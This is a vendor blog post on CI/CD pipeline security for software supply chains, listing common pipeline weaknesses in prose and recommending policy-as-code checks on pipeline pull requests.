* [Blog](https://www.paloaltonetworks.com/blog)
* [Cloud Security](https://www.paloaltonetworks.com/blog/cloud-security/)
* [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/)
* Using Your Pipelines To H...

# Using Your Pipelines To Harden Your Pipelines: The Importance of CI/CD Security for Your Software Supply Chain

[](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fshift-left-ci-cd-security-for-your-software-supply-chain%2F)  
[](https://twitter.com/share?text=Using+Your+Pipelines+To+Harden+Your+Pipelines%3A+The+Importance+of+CI%2FCD+Security+for+Your+Software+Supply+Chain&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fshift-left-ci-cd-security-for-your-software-supply-chain%2F)  
[](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Fwww.paloaltonetworks.com%2Fblog%2Fcloud-security%2Fshift-left-ci-cd-security-for-your-software-supply-chain%2F&title=Using+Your+Pipelines+To+Harden+Your+Pipelines%3A+The+Importance+of+CI%2FCD+Security+for+Your+Software+Supply+Chain&summary=&source=)  
[](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://www.paloaltonetworks.com/blog/cloud-security/shift-left-ci-cd-security-for-your-software-supply-chain/&ts=markdown)  
\[\](mailto:?subject=Using Your Pipelines To Harden Your Pipelines: The Importance of CI/CD Security for Your Software Supply Chain)  
Link copied  
By [Idan Tendler](https://www.paloaltonetworks.com/blog/author/idan-tendler/?ts=markdown "Posts by Idan Tendler")  
Dec 01, 2022  
4 minutes  
[Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown)  
[DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown)  
[policy as code](https://www.paloaltonetworks.com/blog/tag/policy-as-code/?ts=markdown)  
[Software Supply Chain Security](https://www.paloaltonetworks.com/blog/tag/software-supply-chain-security/?ts=markdown)

As the systems we use to deliver software to the cloud get more complex and reliant on third-party components, they also leave more opportunities for attacks. Just last year, software supply chain attacks [jumped 51%](https://www.techrepublic.com/article/supply-chain-cyberattacks-jumped-51-in-2021/), which is proof that bad (and creative) actors are capitalizing on these weaknesses.

[Software supply chains](https://www.paloaltonetworks.com/cyberpedia/what-is-cloud-software-supply-chain-security) are only as strong as their weakest link, and Continuous Integration/Continuous Delivery (CI/CD) pipelines are the latest attack vectors left vulnerable by unassuming [DevOps](https://www.paloaltonetworks.com/blog/prisma-cloud/a-primer-on-secure-devops-learn-the-benefits-of-these-3-devsecops-use-cases/) teams. Just one CI/CD misconfiguration can expose sensitive information and can then be used as an entry point for injecting malicious code and leaking sensitive data. Ultimately, this can corrupt the entire CI/CD pipeline and the software supply chain.

A recent [Unit 42 Cloud Threat Report](https://www.paloaltonetworks.com/prisma/unit42-cloud-threat-research-2h21) found that overly permissive credentials created opportunities for lateral movement and [CI/CD pipeline poisoning](https://www.paloaltonetworks.com/cyberpedia/poisoned-pipeline-execution-cicd-sec4). Additionally, they found that [63% of infrastructure as code (IaC) templates](https://www.cybersecuritydive.com/news/unit-42-cloud-misconfigurations-software-supply-chain-security/607290/) contain misconfigurations, and [91% of container images](https://www.cpomagazine.com/cyber-security/most-cloud-containers-deployed-on-public-registries-contain-vulnerabilities-and-misconfigurations-that-could-result-in-a-supply-chain-attack/) contain high or critical security vulnerabilities.

## **CI/CD and the Software Supply Chain**

[Cloud-native](https://www.paloaltonetworks.com/cyberpedia/what-is-cloud-native) software supply chains combine third-party software components like open source packages and [IaC](https://www.paloaltonetworks.com/blog/prisma-cloud/what-is-infrastructure-as-code-the-best-way-to-fully-control-your-cloud-configuration/) modules, plus the underlying delivery pipelines required to store, manage and deliver software. Those delivery pipelines, such as Git repositories and [CI/CD pipelines](https://www.paloaltonetworks.com/cyberpedia/what-is-the-ci-cd-pipeline-and-ci-cd-security), are the lifeblood of agile teams.

Deploying software multiple times a day is no longer a feat achieved solely by the likes of Netflix and Google. The only way to stay competitive in today's market is to deliver performant, reliable and secure software quickly. And the best way to do that is with a well-oiled CI/CD pipeline.

CI/CD pipelines carry out a number of functions to compile components, provision infrastructure and trigger tests to make sure that the new code does not break existing features and that the new features are working correctly. With [DevSecOps practices](https://www.paloaltonetworks.com/blog/prisma-cloud/scaling-in-the-cloud/) in place, CI/CD pipelines also allow security teams to enforce security best practices before merging into a code base and one last time before deployment. While [shift-left security](https://www.paloaltonetworks.com/cyberpedia/shift-left-security) aims to empower developers to address security even earlier in the development lifecycle, CI/CD pipelines provide the centralized automation required to maintain infrastructure and application security best practices.

## **CI/CD Weaknesses and Software Supply Chain Risks**

As powerful as our CI/CD pipelines are for ensuring the quality and security of our applications before they're deployed, they require care in how they themselves are configured and what user behavior is and isn't allowed. Oversight in this area may lead to unmitigated access to mission-critical services and infrastructure that can allow bad actors to leak sensitive data or inject malicious code or scripts.

**Related Article** : [CICD-SEC-1: Insufficient Flow Control Mechanisms Explained](https://www.paloaltonetworks.com/cyberpedia/insufficient-flow-control-mechanisms-cicd-sec1)

These are some common CI/CD weaknesses to watch out for:

* Allowing the use of deprecated commands/beta features
* Secrets exfiltration with the use of unprotected command executions
* Not preventing network call commands that can be used for code injection
* Allowing tests to run in privileged pods that can be hijacked for nefarious purposes
* Using arbitrary and vulnerable images to execute build and testing, which opens them up to poisoning and attacks

## **Securing Pipelines With Pipelines**

We know that software delivery pipelines create opportunities for poisoning and [cyberattacks](https://www.paloaltonetworks.com/cyberpedia/what-is-a-cyber-attack). At the same time, CI/CD pipelines are crucial for delivering secure software components. So why not take the same approach you take to secure application and infrastructure code in pipelines to secure the pipelines themselves?

Similar to the benefits of finding and fixing vulnerabilities and misconfigurations throughout the development process, being able to identify CI pipeline misconfigurations consistently leads to improved software supply chain security posture. Because CI pipelines are configured in code, you can leverage the same [policy-as-code](https://www.paloaltonetworks.com/cyberpedia/what-is-policy-as-code) approach you might to [identify IaC misconfigurations](https://www.paloaltonetworks.com/prisma/cloud/infrastructure-as-code-security) or open source vulnerabilities to surface [CI/CD weaknesses](https://www.paloaltonetworks.com/cyberpedia/what-is-ci-cd-security).

Flagging suspicious coding patterns in the pipeline code as a pull request that is opened to edit that pipeline code can prevent many of the weaknesses listed above. Automation coupled with human reviews can flag to a developer when they attempt to add a deprecated command to a pipeline as they write their pipeline code or flag to a maintainer when a bad actor opens a pull request to edit pipeline code that includes a secret exfiltration command. By shifting left, security and DevOps teams can work together to proactively harden pipelines by leveraging existing tools and frameworks that make up CI/CD pipelines.

Interested in learning more best practices to secure your software supply chain? Download our [Software Supply Chain Security Checklist](https://www.paloaltonetworks.com/resources/datasheets/software-supply-chain-security-checklist).

This post originally appeared as a [Forbes Technology Council post](https://www.forbes.com/sites/forbestechcouncil/2022/08/23/using-your-pipelines-to-harden-your-pipelines-the-importance-of-cicd-security-for-your-software-supply-chain/?sh=58323861c36d).

*** ** * ** ***

## Related Blogs

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown)

[#### A Primer on Secure DevOps: Learn the Benefits of These 3 DevSecOps Use Cases](https://www.paloaltonetworks.com/blog/cloud-security/a-primer-on-secure-devops-learn-the-benefits-of-these-3-devsecops-use-cases/)

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown)

[#### Scaling in the Cloud? IaC and DevSecOps Are Here to Help](https://www.paloaltonetworks.com/blog/cloud-security/scaling-in-the-cloud/)

### [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown), [Secure the Cloud](https://www.paloaltonetworks.com/blog/category/secure-the-cloud/?ts=markdown)

[#### How To Prevent the 5 Most Common Software Supply Chain Weaknesses](https://www.paloaltonetworks.com/blog/cloud-security/common-software-supply-chain-weaknesses/)

### [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown), [Secure the Cloud](https://www.paloaltonetworks.com/blog/category/secure-the-cloud/?ts=markdown)

[#### How To Prevent the IaC Misconfiguration Snowball Effect](https://www.paloaltonetworks.com/blog/cloud-security/iac-misconfiguration-snowball-effect/)

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown)

[#### AppSec and CloudSec 101: Blurring the Lines Between Cloud-Native App Layers](https://www.paloaltonetworks.com/blog/cloud-security/application-infrastructure-security-101-blurring-cloud-native-app-layers/)

### [Cloud Computing](https://www.paloaltonetworks.com/blog/category/cloud-computing-2/?ts=markdown), [DevSecOps](https://www.paloaltonetworks.com/blog/cloud-security/category/devsecops/?ts=markdown)

[#### Four Steps To Get Started With a 'Bottom-Up' Cybersecurity Approach](https://www.paloaltonetworks.com/blog/cloud-security/four-steps-to-get-started-with-a-bottom-up-cybersecurity-approach/)

### Subscribe to Cloud Security Blogs!

Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more.
![spinner](https://www.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up  
Please enter a valid email.  
By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder.  
This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply.  
{#footer} {#footer}

## Products and Services

* [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown)

* [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown)

* [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown)

* [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown)

* [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown)

* [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown)

* [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown)

* [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown)

* [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown)

* [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown)

* [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown)

* [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown)

* [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown)

* [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown)

* [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown)

* [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown)

* [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown)

* [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown)

* [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown)

* [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown)

* [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown)

* [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown)

* [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown)

* [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown)

* [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown)

* [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown)

* [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown)

* [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown)

* [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown)

* [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown)

* [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown)

* [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown)

* [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown)

* [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown)

* [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown)

* [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown)

* [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown)

* [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown)

* [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown)

* [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown)

* [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown)

* [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown)

* [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown)

## Company

* [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown)
* [Careers](https://jobs.paloaltonetworks.com/en/)
* [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown)
* [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown)
* [Customers](https://www.paloaltonetworks.com/customers?ts=markdown)
* [Investor Relations](https://investors.paloaltonetworks.com/)
* [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown)
* [Newsroom](https://www.paloaltonetworks.com/company/newsroom?ts=markdown)

## Popular Links

* [Blog](https://www.paloaltonetworks.com/blog/?ts=markdown)
* [Communities](https://www.paloaltonetworks.com/communities?ts=markdown)
* [Content Library](https://www.paloaltonetworks.com/resources?ts=markdown)
* [Cyberpedia](https://www.paloaltonetworks.com/cyberpedia?ts=markdown)
* [Event Center](https://events.paloaltonetworks.com/)
* [Manage Email Preferences](https://start.paloaltonetworks.com/preference-center)
* [Products A-Z](https://www.paloaltonetworks.com/products/products-a-z?ts=markdown)
* [Product Certifications](https://www.paloaltonetworks.com/legal-notices/trust-center/compliance?ts=markdown)
* [Report a Vulnerability](https://www.paloaltonetworks.com/security-disclosure?ts=markdown)
* [Sitemap](https://www.paloaltonetworks.com/sitemap?ts=markdown)
* [Tech Docs](https://docs.paloaltonetworks.com/)
* [Unit 42](https://unit42.paloaltonetworks.com/)
* [Do Not Sell or Share My Personal Information](https://panwedd.exterro.net/portal/dsar.htm?target=panwedd)
  ![PAN logo](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/pan-logo-dark.svg)
* [Privacy](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown)
* [Trust Center](https://www.paloaltonetworks.com/legal-notices/trust-center?ts=markdown)
* [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown)
* [Documents](https://www.paloaltonetworks.com/legal?ts=markdown)

Copyright © 2026 Palo Alto Networks. All Rights Reserved

* [![Youtube](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/youtube-black.svg)](https://www.youtube.com/user/paloaltonetworks)
* [![Podcast](https://www.paloaltonetworks.com/content/dam/pan/en_US/images/icons/podcast.svg)](https://www.paloaltonetworks.com/podcasts/threat-vector?ts=markdown)
* [![Facebook](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/facebook-black.svg)](https://www.facebook.com/PaloAltoNetworks/)
* [![LinkedIn](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/linkedin-black.svg)](https://www.linkedin.com/company/palo-alto-networks)
* [![Twitter](https://www.paloaltonetworks.com/etc/clientlibs/clean/imgs/social/twitter-x-black.svg)](https://twitter.com/PaloAltoNtwks)
* EN  
  Select your language